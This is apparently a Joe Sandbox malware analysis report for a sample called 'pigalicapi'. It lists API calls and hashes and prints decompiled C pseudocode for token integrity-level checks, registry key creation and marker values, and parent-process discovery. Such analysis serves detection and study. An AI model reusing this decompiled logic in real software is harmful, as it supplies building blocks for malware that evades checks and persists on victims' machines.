                                                                                                                                                                                                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 024E9A3A
                                                                                                                                                                                                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 024E9A77
                                                                                                                                                                                                                                                                                                        • CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 024E9AAD
                                                                                                                                                                                                                                                                                                        • EqualSid.ADVAPI32(?,00000000), ref: 024E9AC3
                                                                                                                                                                                                                                                                                                        • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,00000044), ref: 024E9AE6
                                                                                                                                                                                                                                                                                                        • EqualSid.ADVAPI32(?), ref: 024E9AFC
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 024E9B7A
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Token$CreateEqualInformationKnownProcessWell$CloseCurrentHandleOpen
                                                                                                                                                                                                                                                                                                        • String ID: D
                                                                                                                                                                                                                                                                                                        • API String ID: 98007406-2746444292
                                                                                                                                                                                                                                                                                                        • Opcode ID: d7e442909d98b6f7d6aae186034cc81a1d555221a58ab69e0166efe47b910dc1
                                                                                                                                                                                                                                                                                                        • Instruction ID: a759b02170a859765882f9087ab1bfbc377141d9c7af17fa78c5cf0cd8aa91f3
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7e442909d98b6f7d6aae186034cc81a1d555221a58ab69e0166efe47b910dc1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D841FE75A40218EBEB24CF90CC85FDAB3BDBF48705F00C5D9E65996281DB709A42CFA1
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E5A00(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				int _v20;
                                                                                                                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                                                                                                                        				CHAR* _t35;
                                                                                                                                                                                                                                                                                                        				int _t39;
                                                                                                                                                                                                                                                                                                        				long _t43;
                                                                                                                                                                                                                                                                                                        				CHAR* _t51;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0 && _a12 > 0x10) {
                                                                                                                                                                                                                                                                                                        					E024E7D20(_t27, "Mzsrkvcweomac", 0, 0xe);
                                                                                                                                                                                                                                                                                                        					lstrcpyA("Mzsrkvcweomac", "WDefault");
                                                                                                                                                                                                                                                                                                        					_t33 = E024E5930(_a4 + 0x45b, "Mzsrkvcweomac", 0xd); // executed
                                                                                                                                                                                                                                                                                                        					E024E7D20(_t33, _a8, 0, _a12);
                                                                                                                                                                                                                                                                                                        					_t35 =  *0x24f189c; // 0x24ec4e0
                                                                                                                                                                                                                                                                                                        					if(lstrlenA(_t35) < _a12) {
                                                                                                                                                                                                                                                                                                        						_t51 =  *0x24f189c; // 0x24ec4e0
                                                                                                                                                                                                                                                                                                        						lstrcpyA(_a8, _t51);
                                                                                                                                                                                                                                                                                                        						_t39 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                                                        						if(_t39 + lstrlenA(?str?) < _a12) {
                                                                                                                                                                                                                                                                                                        							lstrcatA(_a8, "Mzsrkvcweomac");
                                                                                                                                                                                                                                                                                                        							_v12 = 0x80000001;
                                                                                                                                                                                                                                                                                                        							_v16 = 0;
                                                                                                                                                                                                                                                                                                        							_v20 = 0;
                                                                                                                                                                                                                                                                                                        							_t43 = RegCreateKeyExA(_v12, _a8, 0, 0, 0, 0x20006, 0,  &_v16,  &_v20); // executed
                                                                                                                                                                                                                                                                                                        							if(_t43 != 0) {
                                                                                                                                                                                                                                                                                                        								E024E7D20(_t43, _a8, 0, _a12);
                                                                                                                                                                                                                                                                                                        								lstrcpyA(_a8, "software\\microsoft\\windows\\currentversion\\uninstall");
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								RegCloseKey(_v16); // executed
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_v8 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}













                                                                                                                                                                                                                                                                                                        0x024e5a07
                                                                                                                                                                                                                                                                                                        0x024e5a12
                                                                                                                                                                                                                                                                                                        0x024e5a35
                                                                                                                                                                                                                                                                                                        0x024e5a47
                                                                                                                                                                                                                                                                                                        0x024e5a5d
                                                                                                                                                                                                                                                                                                        0x024e5a6f
                                                                                                                                                                                                                                                                                                        0x024e5a77
                                                                                                                                                                                                                                                                                                        0x024e5a86
                                                                                                                                                                                                                                                                                                        0x024e5a8c
                                                                                                                                                                                                                                                                                                        0x024e5a97
                                                                                                                                                                                                                                                                                                        0x024e5aa1
                                                                                                                                                                                                                                                                                                        0x024e5ab9
                                                                                                                                                                                                                                                                                                        0x024e5ac8
                                                                                                                                                                                                                                                                                                        0x024e5ace
                                                                                                                                                                                                                                                                                                        0x024e5ad5
                                                                                                                                                                                                                                                                                                        0x024e5adc
                                                                                                                                                                                                                                                                                                        0x024e5b00
                                                                                                                                                                                                                                                                                                        0x024e5b08
                                                                                                                                                                                                                                                                                                        0x024e5b20
                                                                                                                                                                                                                                                                                                        0x024e5b31
                                                                                                                                                                                                                                                                                                        0x024e5b0a
                                                                                                                                                                                                                                                                                                        0x024e5b0e
                                                                                                                                                                                                                                                                                                        0x024e5b0e
                                                                                                                                                                                                                                                                                                        0x024e5b41
                                                                                                                                                                                                                                                                                                        0x024e5b41
                                                                                                                                                                                                                                                                                                        0x024e5ab9
                                                                                                                                                                                                                                                                                                        0x024e5a86
                                                                                                                                                                                                                                                                                                        0x024e5b4b

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(Mzsrkvcweomac,WDefault), ref: 024E5A47
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5930: CharUpperA.USER32(00000000), ref: 024E59E2
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(024EC4E0), ref: 024E5A7D
                                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(00000000,024EC4E0), ref: 024E5A97
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 024E5AA1
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(Mzsrkvcweomac), ref: 024E5AAE
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,Mzsrkvcweomac), ref: 024E5AC8
                                                                                                                                                                                                                                                                                                        • RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 024E5B00
                                                                                                                                                                                                                                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 024E5B0E
                                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(00000000,software\microsoft\windows\currentversion\uninstall), ref: 024E5B31
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 024E5B3B
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: lstrlen$lstrcpy$CharCloseCreateUpperlstrcat
                                                                                                                                                                                                                                                                                                        • String ID: Mzsrkvcweomac$WDefault$software\microsoft\windows\currentversion\uninstall
                                                                                                                                                                                                                                                                                                        • API String ID: 4161867159-2878899710
                                                                                                                                                                                                                                                                                                        • Opcode ID: 4fe1083c5f5c807082947708a3ff8ff807fc95e5cb4947ba335c4b695301865d
                                                                                                                                                                                                                                                                                                        • Instruction ID: 551b7a4ef8587c452c8c847962d86f61e0ffe9fea5f000b3aa8ea63aebd63c73
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4fe1083c5f5c807082947708a3ff8ff807fc95e5cb4947ba335c4b695301865d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C313B75A40208FBFF14DFE4E889FAE7775AB44716F10890AFB1A9B281D7B095108F50
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                                                                                                                                                                        			E024E1CA0(CHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                                                                                                                                        				char _v272;
                                                                                                                                                                                                                                                                                                        				long _v284;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v300;
                                                                                                                                                                                                                                                                                                        				void* _v308;
                                                                                                                                                                                                                                                                                                        				void* _v312;
                                                                                                                                                                                                                                                                                                        				long _v316;
                                                                                                                                                                                                                                                                                                        				long _v320;
                                                                                                                                                                                                                                                                                                        				void* _v324;
                                                                                                                                                                                                                                                                                                        				char _v328;
                                                                                                                                                                                                                                                                                                        				int _v332;
                                                                                                                                                                                                                                                                                                        				void* _t44;
                                                                                                                                                                                                                                                                                                        				int _t47;
                                                                                                                                                                                                                                                                                                        				void* _t61;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                                                                                                                                        				_t44 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                                                                                                                                                                                                        				_v312 = _t44;
                                                                                                                                                                                                                                                                                                        				if(_v312 == 0xffffffff) {
                                                                                                                                                                                                                                                                                                        					L18:
                                                                                                                                                                                                                                                                                                        					return _v5;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v308 = 0x128;
                                                                                                                                                                                                                                                                                                        				_t47 = Process32First(_v312,  &_v308); // executed
                                                                                                                                                                                                                                                                                                        				if(_t47 == 0) {
                                                                                                                                                                                                                                                                                                        					L17:
                                                                                                                                                                                                                                                                                                        					CloseHandle(_v312);
                                                                                                                                                                                                                                                                                                        					goto L18;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v320 = GetCurrentProcessId();
                                                                                                                                                                                                                                                                                                        				_v316 = 0;
                                                                                                                                                                                                                                                                                                        				while(_v300 != _v320) {
                                                                                                                                                                                                                                                                                                        					if(Process32Next(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                                                                                                                        					if(_v316 != 0 && Process32First(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                                                                        						while(_v300 != _v316) {
                                                                                                                                                                                                                                                                                                        							if(Process32Next(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							goto L17;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						if(lstrlenA( &_v272) < _a8) {
                                                                                                                                                                                                                                                                                                        							lstrcpyA(_a4,  &_v272);
                                                                                                                                                                                                                                                                                                        							_v324 = OpenProcess(0x410, 0, _v316);
                                                                                                                                                                                                                                                                                                        							if(_v324 != 0) {
                                                                                                                                                                                                                                                                                                        								_v332 = 0;
                                                                                                                                                                                                                                                                                                        								_push( &_v332);
                                                                                                                                                                                                                                                                                                        								_push(4);
                                                                                                                                                                                                                                                                                                        								_push( &_v328);
                                                                                                                                                                                                                                                                                                        								_t61 = _v324;
                                                                                                                                                                                                                                                                                                        								_push(_t61); // executed
                                                                                                                                                                                                                                                                                                        								L024EB1D4(); // executed
                                                                                                                                                                                                                                                                                                        								if(_t61 == 0) {
                                                                                                                                                                                                                                                                                                        									_push(_a8);
                                                                                                                                                                                                                                                                                                        									_push(_a4);
                                                                                                                                                                                                                                                                                                        									_push(_v324); // executed
                                                                                                                                                                                                                                                                                                        									L024EB1C8(); // executed
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									_push(_a8);
                                                                                                                                                                                                                                                                                                        									_push(_a4);
                                                                                                                                                                                                                                                                                                        									_push(_v328);
                                                                                                                                                                                                                                                                                                        									_push(_v324);
                                                                                                                                                                                                                                                                                                        									L024EB1CE();
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_v5 = 1;
                                                                                                                                                                                                                                                                                                        								FindCloseChangeNotification(_v324); // executed
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v316 = _v284;
                                                                                                                                                                                                                                                                                                        				goto L6;
                                                                                                                                                                                                                                                                                                        			}

















                                                                                                                                                                                                                                                                                                        0x024e1ca9
                                                                                                                                                                                                                                                                                                        0x024e1cb1
                                                                                                                                                                                                                                                                                                        0x024e1cb6
                                                                                                                                                                                                                                                                                                        0x024e1cc3
                                                                                                                                                                                                                                                                                                        0x024e1e51
                                                                                                                                                                                                                                                                                                        0x024e1e57
                                                                                                                                                                                                                                                                                                        0x024e1e57
                                                                                                                                                                                                                                                                                                        0x024e1cc9
                                                                                                                                                                                                                                                                                                        0x024e1ce1
                                                                                                                                                                                                                                                                                                        0x024e1ce8
                                                                                                                                                                                                                                                                                                        0x024e1e44
                                                                                                                                                                                                                                                                                                        0x024e1e4b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e1e4b
                                                                                                                                                                                                                                                                                                        0x024e1cf4
                                                                                                                                                                                                                                                                                                        0x024e1cfa
                                                                                                                                                                                                                                                                                                        0x024e1d04
                                                                                                                                                                                                                                                                                                        0x024e1d35
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e1d37
                                                                                                                                                                                                                                                                                                        0x024e1d3e
                                                                                                                                                                                                                                                                                                        0x024e1d5f
                                                                                                                                                                                                                                                                                                        0x024e1e3e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e1e3e
                                                                                                                                                                                                                                                                                                        0x024e1d81
                                                                                                                                                                                                                                                                                                        0x024e1d92
                                                                                                                                                                                                                                                                                                        0x024e1dac
                                                                                                                                                                                                                                                                                                        0x024e1db9
                                                                                                                                                                                                                                                                                                        0x024e1dbb
                                                                                                                                                                                                                                                                                                        0x024e1dcb
                                                                                                                                                                                                                                                                                                        0x024e1dcc
                                                                                                                                                                                                                                                                                                        0x024e1dd4
                                                                                                                                                                                                                                                                                                        0x024e1dd5
                                                                                                                                                                                                                                                                                                        0x024e1ddb
                                                                                                                                                                                                                                                                                                        0x024e1ddc
                                                                                                                                                                                                                                                                                                        0x024e1de3
                                                                                                                                                                                                                                                                                                        0x024e1e05
                                                                                                                                                                                                                                                                                                        0x024e1e09
                                                                                                                                                                                                                                                                                                        0x024e1e10
                                                                                                                                                                                                                                                                                                        0x024e1e11
                                                                                                                                                                                                                                                                                                        0x024e1de5
                                                                                                                                                                                                                                                                                                        0x024e1de8
                                                                                                                                                                                                                                                                                                        0x024e1dec
                                                                                                                                                                                                                                                                                                        0x024e1df3
                                                                                                                                                                                                                                                                                                        0x024e1dfa
                                                                                                                                                                                                                                                                                                        0x024e1dfb
                                                                                                                                                                                                                                                                                                        0x024e1dfb
                                                                                                                                                                                                                                                                                                        0x024e1e16
                                                                                                                                                                                                                                                                                                        0x024e1e21
                                                                                                                                                                                                                                                                                                        0x024e1e21
                                                                                                                                                                                                                                                                                                        0x024e1db9
                                                                                                                                                                                                                                                                                                        0x024e1e27
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e1d3e
                                                                                                                                                                                                                                                                                                        0x024e1d18
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 024E1CB1
                                                                                                                                                                                                                                                                                                        • Process32First.KERNEL32(000000FF,00000128), ref: 024E1CE1
                                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 024E1CEE
                                                                                                                                                                                                                                                                                                        • Process32Next.KERNEL32 ref: 024E1D2E
                                                                                                                                                                                                                                                                                                        • Process32First.KERNEL32(000000FF,00000128), ref: 024E1D52
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 024E1D78
                                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(-00000204,?), ref: 024E1D92
                                                                                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 024E1DA6
                                                                                                                                                                                                                                                                                                        • EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 024E1DDC
                                                                                                                                                                                                                                                                                                        • GetModuleFileNameExA.PSAPI(00000000,?,-00000204,024E575B,00000000,?,00000004,00000000), ref: 024E1DFB
                                                                                                                                                                                                                                                                                                        • GetProcessImageFileNameA.PSAPI(00000000,-00000204,024E575B,00000000,?,00000004,00000000), ref: 024E1E11
                                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,024E575B,00000000,?,00000004,00000000), ref: 024E1E21
                                                                                                                                                                                                                                                                                                        • Process32Next.KERNEL32 ref: 024E1E37
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(000000FF), ref: 024E1E4B
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ProcessProcess32$CloseFileFirstNameNext$ChangeCreateCurrentEnumFindHandleImageModuleModulesNotificationOpenSnapshotToolhelp32lstrcpylstrlen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 384183238-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: e85d3127820229cd7d00ab32f544388ab4acf1b040bd49055395b285f42cb74c
                                                                                                                                                                                                                                                                                                        • Instruction ID: d67660a2cee2d440c1ecef299eb7f645be34a503d836456f11f8cdca1bc0fb6b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e85d3127820229cd7d00ab32f544388ab4acf1b040bd49055395b285f42cb74c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA41D9719402189BEF25EBA5CD84BEEB7B9AF48315F0045C9E60EA6280D770AF84CF50
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E5F30() {
                                                                                                                                                                                                                                                                                                        				char* _v8;
                                                                                                                                                                                                                                                                                                        				signed int _v9;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                                                                                                                        				char _v284;
                                                                                                                                                                                                                                                                                                        				int _v288;
                                                                                                                                                                                                                                                                                                        				int _v292;
                                                                                                                                                                                                                                                                                                        				char _v324;
                                                                                                                                                                                                                                                                                                        				int _v328;
                                                                                                                                                                                                                                                                                                        				char* _t27;
                                                                                                                                                                                                                                                                                                        				CHAR* _t30;
                                                                                                                                                                                                                                                                                                        				long _t33;
                                                                                                                                                                                                                                                                                                        				long _t37;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v9 = 0;
                                                                                                                                                                                                                                                                                                        				_t27 =  *0x24f18a0; // 0x24f3b88
                                                                                                                                                                                                                                                                                                        				_v8 = _t27;
                                                                                                                                                                                                                                                                                                        				E024E7D20(_t27,  &_v284, 0, 0x104);
                                                                                                                                                                                                                                                                                                        				lstrcpyA( &_v284, "pigalicapi");
                                                                                                                                                                                                                                                                                                        				_t30 =  *0x24f1898; // 0x24f3fe2
                                                                                                                                                                                                                                                                                                        				lstrcatA( &_v284, _t30);
                                                                                                                                                                                                                                                                                                        				_v16 = 0x80000001;
                                                                                                                                                                                                                                                                                                        				if(( *0x24f435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        					_v16 = 0x80000002;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                                                                                                                        				_t33 = RegOpenKeyExA(_v16, _v8, 0, 0xf003f,  &_v20); // executed
                                                                                                                                                                                                                                                                                                        				if(_t33 == 0) {
                                                                                                                                                                                                                                                                                                        					_v292 = 0x20;
                                                                                                                                                                                                                                                                                                        					_v288 = 0x20;
                                                                                                                                                                                                                                                                                                        					_t37 = RegQueryValueExA(_v20,  &_v284, 0, 0,  &_v324,  &_v288); // executed
                                                                                                                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                                                                                                                        						_v9 = 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t47 = _v9 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        					if((_v9 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        						_v328 = 0x10;
                                                                                                                                                                                                                                                                                                        						E024E9BD0(_t47,  &_v324, 0x10);
                                                                                                                                                                                                                                                                                                        						RegSetValueExA(_v20,  &_v284, 0, 3,  &_v324, 0x10);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					RegCloseKey(_v20); // executed
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v9;
                                                                                                                                                                                                                                                                                                        			}
















                                                                                                                                                                                                                                                                                                        0x024e5f39
                                                                                                                                                                                                                                                                                                        0x024e5f3d
                                                                                                                                                                                                                                                                                                        0x024e5f42
                                                                                                                                                                                                                                                                                                        0x024e5f53
                                                                                                                                                                                                                                                                                                        0x024e5f67
                                                                                                                                                                                                                                                                                                        0x024e5f6d
                                                                                                                                                                                                                                                                                                        0x024e5f7a
                                                                                                                                                                                                                                                                                                        0x024e5f80
                                                                                                                                                                                                                                                                                                        0x024e5f90
                                                                                                                                                                                                                                                                                                        0x024e5f92
                                                                                                                                                                                                                                                                                                        0x024e5f92
                                                                                                                                                                                                                                                                                                        0x024e5f99
                                                                                                                                                                                                                                                                                                        0x024e5fb3
                                                                                                                                                                                                                                                                                                        0x024e5fbb
                                                                                                                                                                                                                                                                                                        0x024e5fc1
                                                                                                                                                                                                                                                                                                        0x024e5fcb
                                                                                                                                                                                                                                                                                                        0x024e5ff2
                                                                                                                                                                                                                                                                                                        0x024e5ffa
                                                                                                                                                                                                                                                                                                        0x024e5ffc
                                                                                                                                                                                                                                                                                                        0x024e5ffc
                                                                                                                                                                                                                                                                                                        0x024e6000
                                                                                                                                                                                                                                                                                                        0x024e6006
                                                                                                                                                                                                                                                                                                        0x024e6008
                                                                                                                                                                                                                                                                                                        0x024e601b
                                                                                                                                                                                                                                                                                                        0x024e603b
                                                                                                                                                                                                                                                                                                        0x024e603b
                                                                                                                                                                                                                                                                                                        0x024e6045
                                                                                                                                                                                                                                                                                                        0x024e6045
                                                                                                                                                                                                                                                                                                        0x024e6051

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(?,pigalicapi), ref: 024E5F67
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,024F3FE2), ref: 024E5F7A
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,024E3C58,00000000,000F003F,00000000), ref: 024E5FB3
                                                                                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 024E5FF2
                                                                                                                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 024E603B
                                                                                                                                                                                                                                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 024E6045
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Value$CloseOpenQuerylstrcatlstrcpy
                                                                                                                                                                                                                                                                                                        • String ID: $ $pigalicapi
                                                                                                                                                                                                                                                                                                        • API String ID: 764223185-550099112
                                                                                                                                                                                                                                                                                                        • Opcode ID: 660f59221f19b185fb4e918f4b6d5b6f3b2722342581d1044fa2248809bcc2f6
                                                                                                                                                                                                                                                                                                        • Instruction ID: 602447c46e1097d8861af7c42e73ca72bfccc3cbcbfefad316e19de205692d7d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 660f59221f19b185fb4e918f4b6d5b6f3b2722342581d1044fa2248809bcc2f6
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D831A4B1D4021CABEF14CF90DC45FFEB778AB48705F008889EB09A6281D7B55644CFA1
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32 ref: 0041033E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00410280: fprintf.MSVCRT ref: 004102C0
                                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00410372
                                                                                                                                                                                                                                                                                                        • CreateEventA.KERNEL32 ref: 0041039A
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 004103D9
                                                                                                                                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 004103DE
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 004103E6
